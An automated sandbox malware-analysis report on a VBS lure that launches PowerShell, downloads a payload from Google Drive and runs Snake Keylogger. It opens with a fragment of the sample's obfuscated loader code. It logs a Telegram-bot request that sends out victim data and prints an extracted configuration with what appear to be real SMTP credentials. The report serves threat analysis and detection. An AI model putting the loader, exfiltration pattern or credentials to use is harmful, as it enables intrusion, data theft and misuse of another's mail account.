Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betl
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T08:43:25.444901+020028033053Unknown Traffic192.168.2.449790188.114.97.3443TCP
              2024-10-24T08:43:30.303761+020028033053Unknown Traffic192.168.2.449821188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T08:43:22.914100+020028032742Potentially Bad Traffic192.168.2.449768193.122.6.16880TCP
              2024-10-24T08:43:24.899602+020028032742Potentially Bad Traffic192.168.2.449768193.122.6.16880TCP
              2024-10-24T08:43:26.414108+020028032742Potentially Bad Traffic192.168.2.449793193.122.6.16880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T08:43:16.923734+020028032702Potentially Bad Traffic192.168.2.449741216.58.206.78443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000008.00000002.2988377794.00000000242C1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "rajan@recsb.com", "Password": "1=vI*r6^", "Host": "mail.recsb.com", "Port": "587", "Version": "4.4"}
              Source: RFQ_64182MR_PDF.R00.vbsReversingLabs: Detection: 26%
              Source: RFQ_64182MR_PDF.R00.vbsVirustotal: Detection: 25%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.8% probability

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49779 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49867 version: TLS 1.2
              Source: Binary string: *.pdbS source: powershell.exe, 00000001.00000002.1956313981.000002681D883000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2175218431.0000000007450000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ment.Automation.pdb source: powershell.exe, 00000006.00000002.2175218431.0000000007431000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\dll\System.Core.pdbsAF source: powershell.exe, 00000001.00000002.1955638921.000002681D7FE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbx source: powershell.exe, 00000001.00000002.1956313981.000002681D883000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2181957745.000000000823C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.pdbnA source: powershell.exe, 00000001.00000002.1955638921.000002681D7FE000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP HTTP/1.1Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2024/10/2024%20/%2017:25:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49793 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49768 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49741 -> 216.58.206.78:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49790 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49821 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49779 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP HTTP/1.1Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download?id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2024/10/2024%20/%2017:25:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 24 Oct 2024 06:43:37 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: powershell.exe, 00000001.00000002.1920855418.000002680752C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000001.00000002.1920855418.00000268075FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1920855418.0000026805411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2153541152.0000000004931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1920855418.0000026805411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2153541152.0000000004931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.1920855418.0000026807188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680752C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 00000001.00000002.1920855418.000002680686E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680752C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJPP
              Source: powershell.exe, 00000006.00000002.2153541152.0000000004A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJPXR#l
              Source: powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268075FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268075FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268059C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP&export=download
              Source: msiexec.exe, 00000008.00000002.2971077056.00000000005AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY&export=download
              Source: powershell.exe, 00000001.00000002.1920855418.0000026805637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1920855418.000002680686E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: msiexec.exe, 00000008.00000002.2990381131.00000000253E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002553B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002540C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: msiexec.exe, 00000008.00000002.2990381131.00000000253E5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002553B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2990381131.000000002540C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2259034676.00000000005D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2259034676.00000000005D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000001.00000002.1920855418.000002680588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.000002680718D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268071B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1920855418.00000268058A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2259034676.00000000005D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49731 version: TLS 1.2
